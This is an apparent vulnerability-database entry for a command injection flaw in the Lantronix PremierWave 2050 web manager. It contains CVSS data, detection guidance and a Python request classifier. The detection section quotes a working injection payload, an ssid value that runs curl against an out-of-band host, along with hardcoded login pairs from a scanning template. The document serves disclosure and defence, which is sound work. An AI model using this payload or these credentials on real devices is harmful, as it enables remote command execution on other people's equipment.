CVE-2021-21881
published 2021-12-22


Priority: P186 · critical · 9.9 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:L / UI:N / S:C / C:H / I:H / A:H
ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 37.06% (98.3rd percentile)
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

Affected (1 range)

Vendor | Product | Version range | Fixed in
lantronix | premierwave_2050_firmware | – | –

Detection & IOCs (extracted from sources)

url: POST / HTTP/1.1 with ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
command: ssid="'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #
other: ajax=WLANScanSSID
  • Detect exploitation attempts by monitoring POST requests to the root path (/) containing the 'ajax=WLANScanSSID' parameter combined with shell metacharacters in the 'ssid' field (e.g., single quotes, semicolons, backticks).
  • The exploit uses HTTP Basic Authentication with hardcoded credentials. Monitor for Base64 values 'dXNlcjp1c2Vy' (user:user) and 'YWRtaW46UEFTUw==' (admin:PASS) in Authorization headers targeting Lantronix PremierWave devices.
  • The vulnerability is triggered via the Web Manager Wireless Network Scanner endpoint. Look for POST requests with Content-Type: application/x-www-form-urlencoded containing 'Scan=Scan' and a malformed 'ssid' parameter with OS command injection payloads.
  • Out-of-band detection: successful exploitation causes the device to issue an outbound HTTP request (e.g., via curl) with a randomized User-Agent header. Monitor for unexpected outbound HTTP connections from Lantronix PremierWave 2050 devices.
  • The nuclei template uses stop-at-first-match with two credential pairs, indicating attackers may try both 'user:user' and 'admin:PASS' sequentially. Alert on multiple rapid authenticated POST requests to the same Lantronix device root path.
  • Exploitation requires prior authentication. The template tests two hardcoded credential pairs (user:user and admin:PASS), but real-world attackers may use other valid credentials. Detection rules should not rely solely on these specific credential values.
  • The User-Agent value used in the injected curl command is randomized per scan (rand_base(6)), so it cannot be used as a static IOC for network detection without dynamic correlation.
  • The vulnerability is specific to Lantronix PremierWave 2050 firmware version 8.9.0.0R4. Detection rules should be scoped to this CPE to avoid false positives.
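The detection points above, turned into a small request classifier, as an added example that is not part of this record, the vendor's firmware, or the Nuclei template; the sample requests it builds are constructed test data, and host names such as device.example and collector.invalid are placeholders:

```python
import re
from urllib.parse import parse_qs, urlencode

# Base64 Basic-auth values named on the page (user:user, admin:PASS); a supporting
# signal only, since any valid credentials reach the vulnerable handler.
KNOWN_BASIC_AUTH = {"dXNlcjp1c2Vy", "YWRtaW46UEFTUw=="}
# Characters an SSID never needs but that terminate or chain a shell command.
SHELL_META = re.compile(r"""[;'"`|&$]""")

def parse_http_request(raw):
    """Split a raw HTTP/1.1 request text into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def detect_wlanscan_injection(raw):
    """Return (severity, reason) findings for one request; empty list = no match."""
    method, path, headers, body = parse_http_request(raw)
    findings = []
    if method != "POST" or path.split("?", 1)[0] != "/":
        return findings
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return findings
    form = parse_qs(body, keep_blank_values=True)
    if form.get("ajax", [""])[0] != "WLANScanSSID":
        return findings
    ssid = form.get("ssid", [""])[0]
    if SHELL_META.search(ssid):
        findings.append(("high", "shell metacharacters in ssid: %r" % ssid))
    auth = headers.get("authorization", "")
    if auth.startswith("Basic ") and auth[6:].strip() in KNOWN_BASIC_AUTH:
        findings.append(("low", "Basic auth uses a credential pair from the public template"))
    return findings

def build_request(ssid, basic_auth=None):
    """Constructed sample request to the scanner endpoint (test data, not a capture)."""
    body = urlencode({"ajax": "WLANScanSSID", "iehack": "", "Scan": "Scan",
                      "netnumber": "1", "2": "link", "3": "3", "ssid": ssid})
    headers = ["Host: device.example", "Content-Type: application/x-www-form-urlencoded",
               "Content-Length: %d" % len(body)]
    if basic_auth:
        headers.append("Authorization: Basic " + basic_auth)
    return "POST / HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n" + body
```

A benign scan (ssid=OfficeWiFi) produces no finding, while the page's quoted payload produces a high finding and, with one of the two template credential pairs, an additional low one.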

CVSS provenance

nvd · v3.1 · 9.9 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd · v3.0 · 9.9 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd · v2.0 · 9.0 CRITICAL · AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck · 9.9 CRITICAL